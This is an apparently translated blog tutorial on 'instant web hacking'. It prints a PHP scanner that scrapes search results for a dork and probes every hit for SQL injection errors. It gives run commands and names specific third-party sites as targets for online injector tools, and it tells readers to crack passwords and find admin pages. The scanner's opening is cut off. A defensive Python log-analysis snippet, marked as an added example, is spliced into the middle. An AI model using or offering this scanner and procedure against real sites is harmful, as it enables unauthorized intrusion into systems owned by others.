Here I focus more on Web Hacking, since it is such a hot topic right now...
Let's get straight into it…
Random Web Hacking
In my opinion this is the easiest: penetrating a website chosen at random. That means we don't decide who our target is; instead, using a search engine as the intermediary (usually, anyway), we look one by one for websites that "we consider" to have a security hole we can exploit.
Here I have a simple PHP script written by XshimeX (it wouldn't feel right to put my own name on the script). Just create sqliscanner.php and paste the following code…
Code:
\n";
    print "[%] Example : $argv[0] inurl:news.php?id=\n";
    exit;
}

/**
 * SQL Bug(syntax error) takes from here: http://www.darkc0de.com/others/devilzc0de.py
 */
$bug = array(
    'You have an error in your SQL',
    'Division by zero in',
    'supplied argument is not a valid MySQL result resource in',
    'Call to a member function',
    'Microsoft JET Database',
    'ODBC Microsoft Access Driver',
    'Microsoft OLE DB Provider for SQL Server',
    'Unclosed quotation mark',
    'Microsoft OLE DB Provider for Oracle',
    'Macromedia][SQLServer JDBC Driver][SQLServer]Incorrect',
    'Incorrect syntax near'
);

print "[@] Start Finding Links...\n";
for($i = 0; $i <= 900; $i += 100) {
    $fp = @file_get_contents("http://www.google.com/search?q=$argv[1]&num=100&hl=en&as_qdr=all&start=$i&sa=N");
    @preg_match_all("/ /", $fp, $links);
    $url[] = $links[2];
}
print "[@] Done Finding Links...\n";

print "[@] Now searching for Vulnerable\n";
foreach($url as $key) {
    foreach($key as $value) {
        $fp = @file_get_contents($value."'");
        foreach($bug as $error) {
            if(@preg_match("/$error/", $fp)) {
                print "[#] Posibble SQL Injection: $value'\n";
                $vuln++;
            } else {
                $not_vuln++;
            }
            $total++;
        }
    }
}
print "[@] Done Scanning\n";

print "[%] Result\n";
print "[-] Total Vulnerable: $vuln\n";
print "[-] Total Not Vulnerable : $not_vuln\n";
print "[-] Total scanned Website: $total\n";
print "Enjoy :)\n";
?>
Then copy the sqliscanner.php file we just created into the PHP folder…
After that, open Command Prompt, go to the C:\php directory and run sqliscanner.php with the following command.
Code:
php.exe sqliscanner.php (DORK)
So the command will look like this…
Code:
php.exe sqliscanner.php inurl:index.php?id=
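Seen from the defending side, the probe this script sends is the original URL with a single quote appended to the last parameter value, which stands out in web server access logs. The Python sketch below is an added example, not part of the original post or of XshimeX's script; the combined log format, the constructed sample lines and the function name `quote_probes` are assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Constructed sample lines in "combined" access-log format (not real traffic).
SAMPLE_LOG = """\
203.0.113.7 - - [10/Mar/2024:10:00:01 +0000] "GET /news.php?id=36' HTTP/1.0" 200 512 "-" "-"
203.0.113.7 - - [10/Mar/2024:10:00:02 +0000] "GET /index.php?ID=403%27 HTTP/1.0" 500 230 "-" "-"
198.51.100.4 - - [10/Mar/2024:10:00:05 +0000] "GET /news.php?id=36 HTTP/1.1" 200 9120 "-" "Mozilla/5.0"
198.51.100.9 - - [10/Mar/2024:10:00:09 +0000] "GET /search.php?q=o'brien+books HTTP/1.1" 200 4410 "-" "Mozilla/5.0"
"""

# Assumed layout: ip ident user [time] "request" status size "referer" "user-agent"
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "[A-Z]+ (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"'
)


def quote_probes(log_text):
    """Return {client_ip: [hit, ...]} for requests that look like the quote probe."""
    hits = {}
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # skip lines that are not in the assumed format
        parts = urlsplit(m["target"])
        # parse_qsl percent-decodes, so "'" and "%27" are treated alike.
        for name, value in parse_qsl(parts.query, keep_blank_values=True):
            # One lone quote at the very end of a value is the probe shape;
            # a quote inside ordinary text (o'brien) is not flagged.
            if value.endswith("'") and value.count("'") == 1:
                hits.setdefault(m["ip"], []).append({
                    "path": parts.path,
                    "param": name,
                    "status": int(m["status"]),
                    # PHP's file_get_contents() sends no User-Agent unless the
                    # user_agent ini setting is set, so "-" is a supporting signal.
                    "no_user_agent": m["ua"] in ("", "-"),
                })
    return hits


if __name__ == "__main__":
    for ip, found in quote_probes(SAMPLE_LOG).items():
        print(ip, found)
```

Clients that accumulate hits across several paths in a short window are worth rate-limiting, and the flagged parameters are the ones to review for parameterized queries and disabled error display.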
If you look closely at the source code of sqliscanner.php, you will see it uses http://www.google.com/search?. We can also edit it however we like, replacing the Google domain name with the one for the country we want. Here is the list…
Code:
site:my
So what next? OK, for the second stage there is a really cool online tool made by Master Ketek… What else but http://tools.kerinci.net/?x=injector. Seriously, it is really cool. OK, now paste the link we got earlier from scanning with sqliscanner.php, namely…
Code:
http://www.greenbergresearch.com/index.php?ID=403
Ah… version 4, can't be bothered. That's it for the article… Hahaha, just kidding, bro. Honestly, here I am not focusing directly on how to get the database, dump it, find the admin page and deface or upload a shell; what matters is that we now know which methods and tools we can use.
There is one more online tool that works similarly to sqliscanner.php, at http://revtan.site40.net/, more precisely the SQLi Dork Scanner, and the results are roughly the same…
The tools there are not just an SQLi scanner; there are also a Login Page Finder and a Hash Cracker… OK, speeding things up: suppose we have got a target and it happens to be version 5, go straight to http://tools.kerinci.net/?x=injector and paste the URL
Code:
http://www.indiesmovies.com/news.php?section=movienews&layer=detail&id=36
Then go ahead and crack the password and find the admin page yourself…
Dedicated Web Hacking
This one is a mix of hard and easy, in my opinion: the website we are going to attack is one we have chosen ourselves. It is easy if we happen to find the vulnerability, and hard if we don't find one at all. There are many methods we could use, but I am not very skilled at this. Hahaha…
Usually I use darkjumper, and you can go ahead and read about it here.
OK, that's it for these light tutorials from me. Remember… Hacking is an Art!!! That is why everyone has their own methods, so don't get fixated on just one thing. Find your own way. See you in the next tutorial…
Source : http://cruzenaldo.com/instant-web-hacking/